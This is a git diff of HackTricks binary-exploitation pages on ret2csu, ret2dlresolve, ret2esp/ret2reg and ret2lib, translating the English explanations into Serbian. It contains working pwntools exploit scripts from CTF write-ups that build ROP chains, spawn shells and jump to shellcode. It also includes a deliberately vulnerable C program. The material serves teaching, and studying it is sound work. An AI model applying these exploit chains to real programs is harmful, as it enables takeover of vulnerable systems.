 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
index 73cbb4e58..368fead80 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@@ -4,18 +4,17 @@
 
 ##
 
-## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information
+## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Osnovne informacije
 
-**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.
+**ret2csu** je tehnika hakovanja koja se koristi kada pokušavate da preuzmete kontrolu nad programom, ali ne možete pronaći **gadgets** koje obično koristite za manipulaciju ponašanjem programa.
 
-When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.
+Kada program koristi određene biblioteke (kao što je libc), ima neke ugrađene funkcije za upravljanje načinom na koji različiti delovi programa komuniciraju jedni s drugima. Među tim funkcijama su neki skriveni dragulji koji mogu delovati kao naši nedostajući gadgets, posebno jedan pod nazivom `__libc_csu_init`.
 
-### The Magic Gadgets in \_\_libc_csu_init
+### Čarobni Gadgets u \_\_libc_csu_init
 
-In **`__libc_csu_init`**, there are two sequences of instructions (gadgets) to highlight:
-
-1. The first sequence lets us set up values in several registers (rbx, rbp, r12, r13, r14, r15). These are like slots where we can store numbers or addresses we want to use later.
+U **`__libc_csu_init`**, postoje dve sekvence instrukcija (gadgets) koje treba istaknuti:
 
+1. Prva sekvenca nam omogućava da postavimo vrednosti u nekoliko registara (rbx, rbp, r12, r13, r14, r15). Ovo su kao slotovi gde možemo da čuvamo brojeve ili adrese koje želimo da koristimo kasnije.
 ```armasm
 pop rbx;
 pop rbp;
@@ -25,22 +24,18 @@ pop r14;
 pop r15;
 ret;
 ```
+Ovaj uređaj nam omogućava da kontrolišemo ove registre tako što izbacujemo vrednosti sa steka u njih.
 
-This gadget allows us to control these registers by popping values off the stack into them.
-
-2. The second sequence uses the values we set up to do a couple of things:
-   - **Move specific values into other registers**, making them ready for us to use as parameters in functions.
-   - **Perform a call to a location** determined by adding together the values in r15 and rbx, then multiplying rbx by 8.
-
+2. Druga sekvenca koristi vrednosti koje smo postavili da uradi nekoliko stvari:
+- **Premesti specifične vrednosti u druge registre**, pripremajući ih za korišćenje kao parametre u funkcijama.
+- **Izvršiti poziv na lokaciju** određenu sabiranjem vrednosti u r15 i rbx, a zatim množenjem rbx sa 8.
 ```armasm
 mov rdx, r15;
 mov rsi, r14;
 mov edi, r13d;
 call qword [r12 + rbx*8];
 ```
-
-3. Maybe you don't know any address to write there and you **need a `ret` instruction**. Note that the second gadget will also **end in a `ret`**, but you will need to meet some **conditions** in order to reach it:
-
+3. Možda ne znate nijednu adresu na koju biste mogli da pišete i **potrebna vam je `ret` instrukcija**. Imajte na umu da će drugi gadget takođe **završiti sa `ret`**, ali ćete morati da ispunite neke **uslove** da biste do njega došli:
 ```armasm
 mov rdx, r15;
 mov rsi, r14;
@@ -52,50 +47,46 @@ jnz 
 ...
 ret
 ```
+Uslovi će biti:
 
-The conditions will be:
-
-- `[r12 + rbx*8]` must be pointing to an address storing a callable function (if no idea and no pie, you can just use `_init` func):
-  - If \_init is at `0x400560`, use GEF to search for a pointer in memory to it and make `[r12 + rbx*8]` be the address with the pointer to \_init:
-
+- `[r12 + rbx*8]` mora da pokazuje na adresu koja čuva pozivnu funkciju (ako nemate ideju i nema pie, možete jednostavno koristiti funkciju `_init`):
+- Ako je \_init na `0x400560`, koristite GEF da pretražite memoriju za pokazivač na nju i učinite da `[r12 + rbx*8]` bude adresa sa pokazivačem na \_init:
 ```bash
 # Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
 gef➤  search-pattern 0x400560
 [+] Searching '\x60\x05\x40' in memory
 [+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x
-  0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
+0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
 [+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r--
-  0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"
+0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"
 ```
+- `rbp` i `rbx` moraju imati istu vrednost da bi se izbegao skok
+- Postoje neki izostavljeni pops koje treba uzeti u obzir
 
-- `rbp` and `rbx` must have the same value to avoid the jump
-- There are some omitted pops you need to take into account
+## RDI i RSI
 
-## RDI and RSI
-
-Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
+Još jedan način da kontrolišete **`rdi`** i **`rsi`** iz ret2csu gadgeta je pristupanje specifičnim ofsetima:
 
 
https://www.scs.stanford.edu/brop/bittau-brop.pdf

 
-Check this page for more info:
+Proverite ovu stranicu za više informacija:
 
 {{#ref}}
 brop-blind-return-oriented-programming.md
 {{#endref}}
 
-## Example
+## Primer
 
-### Using the call
+### Korišćenje poziva
 
-Imagine you want to make a syscall or call a function like `write()` but need specific values in the `rdx` and `rsi` registers as parameters. Normally, you'd look for gadgets that set these registers directly, but you can't find any.
+Zamislite da želite da izvršite syscall ili pozovete funkciju kao što je `write()`, ali su vam potrebne specifične vrednosti u registrima `rdx` i `rsi` kao parametri. Obično biste tražili gadgete koji direktno postavljaju te registre, ali ne možete pronaći nijedan.
 
-Here's where **ret2csu** comes into play:
+Evo gde **ret2csu** dolazi u igru:
 
-1. **Set Up the Registers**: Use the first magic gadget to pop values off the stack and into rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), and r15.
-2. **Use the Second Gadget**: With those registers set, you use the second gadget. This lets you move your chosen values into `rdx` and `rsi` (from r14 and r13, respectively), readying parameters for a function call. Moreover, by controlling `r15` and `rbx`, you can make the program call a function located at the address you calculate and place into `[r15 + rbx*8]`.
-
-You have an [**example using this technique and explaining it here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), and this is the final exploit it used:
+1. **Postavite Registre**: Koristite prvi magični gadget da izvučete vrednosti sa steka i smestite ih u rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx) i r15.
+2. **Koristite Drugi Gadget**: Kada su ti registri postavljeni, koristite drugi gadget. Ovo vam omogućava da premestite izabrane vrednosti u `rdx` i `rsi` (iz r14 i r13, redom), pripremajući parametre za poziv funkcije. Štaviše, kontrolišući `r15` i `rbx`, možete naterati program da pozove funkciju smeštenu na adresi koju izračunate i stavite u `[r15 + rbx*8]`.
 
+Imate [**primer korišćenja ove tehnike i objašnjenja ovde**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), a ovo je konačni exploit koji je korišćen:
 ```python
 from pwn import *
 
@@ -119,14 +110,12 @@ p.sendlineafter('me\n', rop.chain())
 p.sendline(p64(elf.sym['win']))            # send to gets() so it's written
 print(p.recvline())                        # should receive "Awesome work!"
 ```
-
 > [!WARNING]
-> Note that the previous exploit isn't meant to do a **`RCE`**, it's meant to just call a function called **`win`** (taking the address of `win` from stdin calling gets in the ROP chain and storing it in r15) with a third argument with the value `0xdeadbeefcafed00d`.
+> Imajte na umu da prethodni exploit nije namenjen za **`RCE`**, već samo da pozove funkciju pod nazivom **`win`** (uzimajući adresu `win` iz stdin pozivajući gets u ROP lancu i čuvajući je u r15) sa trećim argumentom čija je vrednost `0xdeadbeefcafed00d`.
 
-### Bypassing the call and reaching ret
-
-The following exploit was extracted [**from this page**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) where the **ret2csu** is used but instead of using the call, it's **bypassing the comparisons and reaching the `ret`** after the call:
+### Zaobilaženje poziva i dolazak do ret
 
+Sledeći exploit je izvučen [**sa ove stranice**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) gde se koristi **ret2csu**, ali umesto korišćenja poziva, **zaobilazi poređenja i dolazi do `ret`** nakon poziva:
 ```python
 # Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
 # This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/
@@ -176,9 +165,8 @@ payload += ret2win
 target.sendline(payload)
 target.interactive()
 ```
+### Zašto ne koristiti libc direktno?
 
-### Why Not Just Use libc Directly?
-
-Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
+Obično su ovi slučajevi takođe ranjivi na [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), ali ponekad je potrebno kontrolisati više parametara nego što se lako može kontrolisati sa gadgetima koje direktno pronađete u libc. Na primer, `write()` funkcija zahteva tri parametra, i **pronalazak gadgeta za postavljanje svih ovih direktno možda neće biti moguć**.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
index 1fc2ea86a..10b33d439 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
@@ -2,38 +2,37 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-As explained in the page about [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) and [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function **`_dl_runtime_resolve`**.
+Kao što je objašnjeno na stranici o [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) i [**Relro**](../common-binary-protections-and-bypasses/relro.md), binarni fajlovi bez Full Relro će rešavati simbole (kao što su adrese do spoljašnjih biblioteka) prvi put kada se koriste. Ova rezolucija se dešava pozivanjem funkcije **`_dl_runtime_resolve`**.
 
-The **`_dl_runtime_resolve`** function takes from the stack references to some structures it needs in order to **resolve** the specified symbol.
+Funkcija **`_dl_runtime_resolve`** uzima sa steka reference na neke strukture koje su joj potrebne da **reši** specificirani simbol.
 
-Therefore, it's possible to **fake all these structures** to make the dynamic linked resolving the requested symbol (like **`system`** function) and call it with a configured parameter (e.g. **`system('/bin/sh')`**).
+Stoga, moguće je **falsifikovati sve te strukture** kako bi dinamički povezano rešavanje traženog simbola (kao što je funkcija **`system`**) i pozvati je sa konfigurisanom parametrima (npr. **`system('/bin/sh')`**).
 
-Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`.
+Obično, sve te strukture se falsifikuju pravljenjem **inicijalnog ROP lanca koji poziva `read`** preko zapisive memorije, zatim se **strukture** i string **`'/bin/sh'`** prosleđuju tako da ih `read` sačuva na poznatoj lokaciji, a zatim ROP lanac nastavlja pozivajući **`_dl_runtime_resolve`**, imajući da **reši adresu `system`** u falsifikovanim strukturama i **poziva ovu adresu** sa adresom do `$'/bin/sh'`.
 
 > [!TIP]
-> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming/)) and there are't ways to leak libc addresses.
+> Ova tehnika je posebno korisna ako ne postoje syscall gadgeti (da se koriste tehnike kao što su [**ret2syscall**](rop-syscall-execv/) ili [SROP](srop-sigreturn-oriented-programming/)) i nema načina da se procure libc adrese.
 
-Chek this video for a nice explanation about this technique in the second half of the video:
+Pogledajte ovaj video za lepo objašnjenje o ovoj tehnici u drugoj polovini videa:
 
 {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
 
-Or check these pages for a step-by-step explanation:
+Ili pogledajte ove stranice za objašnjenje korak po korak:
 
 - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works)
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)
 
-## Attack Summary
+## Sažetak napada
 
-1. Write fake estructures in some place
-2. Set the first argument of system (`$rdi = &'/bin/sh'`)
-3. Set on the stack the addresses to the structures to call **`_dl_runtime_resolve`**
-4. **Call** `_dl_runtime_resolve`
-5. **`system`** will be resolved and called with `'/bin/sh'` as argument
-
-From the [**pwntools documentation**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html), this is how a **`ret2dlresolve`** attack look like:
+1. Napisati falsifikovane strukture na nekom mestu
+2. Postaviti prvi argument funkcije system (`$rdi = &'/bin/sh'`)
+3. Postaviti na stek adrese do struktura da pozove **`_dl_runtime_resolve`**
+4. **Pozvati** `_dl_runtime_resolve`
+5. **`system`** će biti rešen i pozvan sa `'/bin/sh'` kao argumentom
 
+Iz [**pwntools dokumentacije**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html), ovako izgleda **`ret2dlresolve`** napad:
 ```python
 context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))
 >>> rop = ROP(elf)
@@ -53,13 +52,11 @@ context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))
 0x0040:         0x4003e0 [plt_init] system
 0x0048:          0x15670 [dlresolve index]
 ```
+## Primer
 
-## Example
-
-### Pure Pwntools
-
-You can find an [**example of this technique here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **containing a very good explanation of the final ROP chain**, but here is the final exploit used:
+### Čisti Pwntools
 
+Možete pronaći [**primer ove tehnike ovde**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **koji sadrži veoma dobro objašnjenje konačnog ROP lanca**, ali ovde je konačni exploit koji je korišćen:
 ```python
 from pwn import *
 
@@ -81,9 +78,7 @@ p.sendline(dlresolve.payload)    # now the read is called and we pass all the re
 
 p.interactive()
 ```
-
-### Raw
-
+### Sirovo
 ```python
 # Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html
 # This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystack
@@ -186,12 +181,11 @@ target.send(paylaod2)
 # Enjoy the shell!
 target.interactive()
 ```
-
-## Other Examples & References
+## Ostali Primeri i Reference
 
 - [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
 - [https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html](https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html)
-  - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.
+- 32bit, bez relro, bez kanarinca, nx, bez pie, osnovni mali buffer overflow i povratak. Da bi se iskoristilo, bof se koristi da ponovo pozove `read` sa `.bss` sekcijom i većom veličinom, da bi se u nju smeštale `dlresolve` lažne tabele za učitavanje `system`, vraćanje na main i ponovna zloupotreba inicijalnog bof-a da pozove dlresolve i zatim `system('/bin/sh')`.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
index 868f6ffa5..b90f72753 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
@@ -4,27 +4,24 @@
 
 ## **Ret2esp**
 
-**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored.
+**Pošto ESP (Stack Pointer) uvek pokazuje na vrh steka**, ova tehnika uključuje zamenu EIP (Instruction Pointer) sa adresom **`jmp esp`** ili **`call esp`** instrukcije. Na taj način, shellcode se postavlja odmah nakon prepisanog EIP-a. Kada se izvrši `ret` instrukcija, ESP pokazuje na sledeću adresu, tačno gde je shellcode smešten.
 
-If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)).
+Ako **Address Space Layout Randomization (ASLR)** nije omogućen u Windows-u ili Linux-u, moguće je koristiti `jmp esp` ili `call esp` instrukcije koje se nalaze u deljenim bibliotekama. Međutim, sa aktivnim [**ASLR**](../common-binary-protections-and-bypasses/aslr/), možda će biti potrebno da se potraže ove instrukcije unutar same ranjive aplikacije (i možda će biti potrebno da se savlada [**PIE**](../common-binary-protections-and-bypasses/pie/)).
 
-Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack.
+Štaviše, mogućnost postavljanja shellcode-a **posle korupcije EIP-a**, umesto u sredini steka, osigurava da bilo koje `push` ili `pop` instrukcije izvršene tokom rada funkcije ne ometaju shellcode. Ova ometanja mogla bi se desiti ako bi shellcode bio postavljen u sredini steka funkcije.
 
-### Lacking space
-
-If you are lacking space to write after overwriting RIP (maybe just a few bytes), write an initial **`jmp`** shellcode like:
+### Nedostatak prostora
 
+Ako vam nedostaje prostora da pišete nakon prepisivanja RIP-a (možda samo nekoliko bajtova), napišite inicijalni **`jmp`** shellcode kao:
 ```armasm
 sub rsp, 0x30
 jmp rsp
 ```
+I napišite shellcode rano na steku.
 
-And write the shellcode early in the stack.
-
-### Example
-
-You can find an example of this technique in [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) with a final exploit like:
+### Primer
 
+Možete pronaći primer ove tehnike u [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) sa konačnim eksploatom kao:
 ```python
 from pwn import *
 
@@ -36,17 +33,15 @@ jmp_rsp = next(elf.search(asm('jmp rsp')))
 payload = b'A' * 120
 payload += p64(jmp_rsp)
 payload += asm('''
-    sub rsp, 10;
-    jmp rsp;
+sub rsp, 10;
+jmp rsp;
 ''')
 
 pause()
 p.sendlineafter('RSP!\n', payload)
 p.interactive()
 ```
-
-You can see another example of this technique in [https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html](https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html). There is a buffer overflow without NX enabled, it's used a gadget to r**educe the address of `$esp`** and then a `jmp esp;` to jump to the shellcode:
-
+Možete videti još jedan primer ove tehnike u [https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html](https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html). Postoji buffer overflow bez omogućene NX, koristi se gadget da **smanji adresu `$esp`** i zatim `jmp esp;` da skoči na shellcode:
 ```python
 # From https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html
 from pwn import *
@@ -81,47 +76,41 @@ target.sendline(payload)
 # Drop to an interactive shell
 target.interactive()
 ```
-
 ## Ret2reg
 
-Similarly, if we know a function returns the address where the shellcode is stored, we can leverage **`call eax`** or **`jmp eax`** instructions (known as **ret2eax** technique), offering another method to execute our shellcode. Just like eax, **any other register** containing an interesting address could be used (**ret2reg**).
+Slično, ako znamo da funkcija vraća adresu na kojoj je smešten shellcode, možemo iskoristiti **`call eax`** ili **`jmp eax`** instrukcije (poznate kao **ret2eax** tehnika), nudeći još jedan način za izvršavanje našeg shellcode-a. Baš kao i eax, **bilo koji drugi registar** koji sadrži zanimljivu adresu može se koristiti (**ret2reg**).
 
-### Example
+### Primer
 
-You can find some examples here: 
+Možete pronaći neke primere ovde: 
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg)
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)
-  - **`strcpy`** will be store in **`eax`** the address of the buffer where the shellcode was stored and **`eax`** isn't being overwritten, so it's possible use a `ret2eax`.
+- **`strcpy`** će u **`eax`** sačuvati adresu bafera gde je shellcode bio smešten i **`eax`** se ne prepisuje, tako da je moguće koristiti `ret2eax`.
 
 ## ARM64
 
 ### Ret2sp
 
-In ARM64 there **aren't** instructions allowing to **jump to the SP registry**. It might be possible to find a gadget that **moves sp to a registry and then jumps to that registry**, but in the libc of my kali I couldn't find any gadget like that:
-
+U ARM64 ne **postoji** instrukcija koja omogućava **skakanje na SP registar**. Možda bi bilo moguće pronaći gadget koji **premesti sp u registar i zatim skoči na taj registar**, ali u libc mog kali nisam mogao pronaći takav gadget:
 ```bash
 for i in `seq 1 30`; do
-    ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
+ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
 done
 ```
-
-The only ones I discovered would change the value of the registry where sp was copied before jumping to it (so it would become useless):
+Jedini koje sam otkrio bi promenili vrednost registra gde je sp kopiran pre nego što se na njega skoči (tako da bi postao beskoristan):
 
 

 
 ### Ret2reg
 
-If a registry has an interesting address it's possible to jump to it just finding the adequate instruction. You could use something like:
-
+Ako registar ima zanimljivu adresu, moguće je skočiti na nju jednostavno pronalazeći adekvatnu instrukciju. Možete koristiti nešto poput:
 ```bash
 ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";
 ```
+U ARM64, **`x0`** čuva povratnu vrednost funkcije, tako da može biti da x0 čuva adresu bafera koji kontroliše korisnik sa shellcode-om za izvršavanje.
 
-In ARM64, it's **`x0`** who stores the return value of a function, so it could be that x0 stores the address of a buffer controlled by the user with a shellcode to execute.
-
-Example code:
-
+Primer koda:
 ```c
 // clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack
 
@@ -129,34 +118,32 @@ Example code:
 #include 
 
 void do_stuff(int do_arg){
-    if (do_arg == 1)
-        __asm__("br x0");
-    return;
+if (do_arg == 1)
+__asm__("br x0");
+return;
 }
 
 char* vulnerable_function() {
-    char buffer[64];
-    fgets(buffer, sizeof(buffer)*3, stdin);
-    return buffer;
+char buffer[64];
+fgets(buffer, sizeof(buffer)*3, stdin);
+return buffer;
 }
 
 int main(int argc, char **argv) {
-    char* b = vulnerable_function();
-    do_stuff(2)
-    return 0;
+char* b = vulnerable_function();
+do_stuff(2)
+return 0;
 }
 ```
-
-Checking the disassembly of the function it's possible to see that the **address to the buffer** (vulnerable to bof and **controlled by the user**) is **stored in `x0`** before returning from the buffer overflow:
+Proverom disasembly-a funkcije moguće je videti da je **adresa do bafera** (vulnerabilna na bof i **kontrolisana od strane korisnika**) **smeštena u `x0`** pre nego što se vrati iz buffer overflow-a:
 
 

 
-It's also possible to find the gadget **`br x0`** in the **`do_stuff`** function:
+Takođe je moguće pronaći gadget **`br x0`** u funkciji **`do_stuff`**:
 
 

 
-We will use that gadget to jump to it because the binary is compile **WITHOUT PIE.** Using a pattern it's possible to see that the **offset of the buffer overflow is 80**, so the exploit would be:
-
+Iskoristićemo taj gadget da skočimo na njega jer je binarni fajl kompajliran **BEZ PIE.** Koristeći obrazac, moguće je videti da je **offset buffer overflow-a 80**, tako da bi exploit bio:
 ```python
 from pwn import *
 
@@ -171,17 +158,16 @@ payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0
 p.sendline(payload)
 p.interactive()
 ```
-
 > [!WARNING]
-> If instead of `fgets` it was used something like **`read`**, it would have been possible to bypass PIE also by **only overwriting the last 2 bytes of the return address** to return to the `br x0;` instruction without needing to know the complete address.\
-> With `fgets` it doesn't work because it **adds a null (0x00) byte at the end**.
+> Ako je umesto `fgets` korišćena neka funkcija poput **`read`**, bilo bi moguće zaobići PIE tako što bi se **samo prepisala poslednja 2 bajta adrese povratka** da bi se vratio na instrukciju `br x0;` bez potrebe da se zna cela adresa.\
+> Sa `fgets` to ne funkcioniše jer **dodaje null (0x00) bajt na kraju**.
 
-## Protections
+## Protekcije
 
-- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
-- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register.
+- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): Ako stek nije izvršiv, ovo neće pomoći jer treba da stavimo shellcode na stek i skočimo da ga izvršimo.
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Ove zaštite mogu otežati pronalaženje instrukcije na koju treba skočiti, bilo na esp ili neki drugi registar.
 
-## References
+## Reference
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode)
 - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp)
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
index c213407d3..377965741 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
@@ -2,103 +2,90 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **Osnovne informacije**
 
-The essence of **Ret2Libc** is to redirect the execution flow of a vulnerable program to a function within a shared library (e.g., **system**, **execve**, **strcpy**) instead of executing attacker-supplied shellcode on the stack. The attacker crafts a payload that modifies the return address on the stack to point to the desired library function, while also arranging for any necessary arguments to be correctly set up according to the calling convention.
+Suština **Ret2Libc** je preusmeravanje toka izvršavanja ranjivog programa na funkciju unutar deljene biblioteke (npr., **system**, **execve**, **strcpy**) umesto izvršavanja napadačevog shell koda na steku. Napadač kreira payload koji menja adresu povratka na steku da pokazuje na željenu funkciju biblioteke, dok takođe obezbeđuje da su svi potrebni argumenti ispravno postavljeni prema konvenciji pozivanja.
 
-### **Example Steps (simplified)**
+### **Primer koraka (pojednostavljeno)**
 
-- Get the address of the function to call (e.g. system) and the command to call (e.g. /bin/sh)
-- Generate a ROP chain to pass the first argument pointing to the command string and the execution flow to the function
+- Dobiti adresu funkcije koju treba pozvati (npr. system) i komandu koju treba pozvati (npr. /bin/sh)
+- Generisati ROP lanac da prosledi prvi argument koji pokazuje na string komande i tok izvršavanja funkciji
 
-## Finding the addresses
-
-- Supposing that the `libc` used is the one from current machine you can find where it'll be loaded in memory with:
+## Pronalaženje adresa
 
+- Pretpostavljajući da je `libc` koja se koristi ona sa trenutnog računara, možete pronaći gde će biti učitana u memoriji sa:
 ```bash
 ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
 ```
-
-If you want to check if the ASLR is changing the address of libc you can do:
-
+Ako želite da proverite da li ASLR menja adresu libc, možete uraditi:
 ```bash
 for i in `seq 0 20`; do ldd ./ | grep libc; done
 ```
-
-- Knowing the libc used it's also possible to find the offset to the `system` function with:
-
+- Poznavanje korišćene libc takođe omogućava pronalaženje ofseta do `system` funkcije sa:
 ```bash
 readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
 ```
-
-- Knowing the libc used it's also possible to find the offset to the string `/bin/sh` function with:
-
+- Poznavanje korišćenog libc-a takođe omogućava pronalaženje ofseta do stringa `/bin/sh` funkcije sa:
 ```bash
 strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
 ```
+### Koristeći gdb-peda / GEF
 
-### Using gdb-peda / GEF
-
-Knowing the libc used, It's also possible to use Peda or GEF to get address of **system** function, of **exit** function and of the string **`/bin/sh`** :
-
